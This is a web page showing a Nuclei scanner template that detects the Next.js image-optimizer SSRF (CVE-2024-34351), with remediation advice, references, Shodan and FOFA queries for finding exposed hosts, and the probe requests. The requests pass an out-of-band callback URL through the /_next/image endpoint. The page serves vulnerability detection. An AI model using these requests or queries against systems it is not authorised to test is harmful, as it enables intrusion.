Next.js - Server Side Request Forgery (SSRF)
ID: CVE-2024-34351
Severity: high
Author: righettod
Tags: cve,cve2024,vercel,nextjs,ssrf
Description
Section titled “Description”Next.Js, inferior to version 14.1.1, have its image optimization built-in component prone to SSRF.
YAML Source
Section titled “YAML Source”id: CVE-2024-34351
info: name: Next.js - Server Side Request Forgery (SSRF) author: righettod severity: high description: | Next.Js, inferior to version 14.1.1, have its image optimization built-in component prone to SSRF. remediation: Upgrade to Next.js version 14.1.1 or higher. reference: - https://www.assetnote.io/resources/research/digging-for-ssrf-in-nextjs-apps - https://nvd.nist.gov/vuln/detail/CVE-2024-34351 - https://github.com/vercel/next.js/security/advisories/GHSA-fr5h-rqp8-mj6g - https://github.com/vercel/next.js/commit/8f7a6ca7d21a97bc9f7a1bbe10427b5ad74b9085 - https://github.com/vercel/next.js/pull/62561 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2024-34351 cwe-id: CWE-918 epss-score: 0.00062 epss-percentile: 0.26843 metadata: max-request: 2 product: next.js shodan-query: - http.html:"/_next/static" - cpe:"cpe:2.3:a:zeit:next.js" fofa-query: body="/_next/static" tags: cve,cve2024,vercel,nextjs,ssrf
http: - method: GET path: - '{{BaseURL}}/_next/image?w=16&q=10&url=http://{{interactsh-url}}' - '{{BaseURL}}/_next/image?w=16&q=10&url=https://{{interactsh-url}}'
stop-at-first-match: true matchers-condition: and matchers: - type: word part: interactsh_protocol words: - 'http'
- type: word part: body words: - "The requested resource isn't a valid image"# digest: 4a0a00473045022100c5dcbeb9576d1644ca7d04f919776040c93a81d213153b2f86ad0a254bae1ab20220394f33d24be8990375cc749246d86518f7c3eab3d3ca7a0cc809d295c112393c:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-34351.yaml"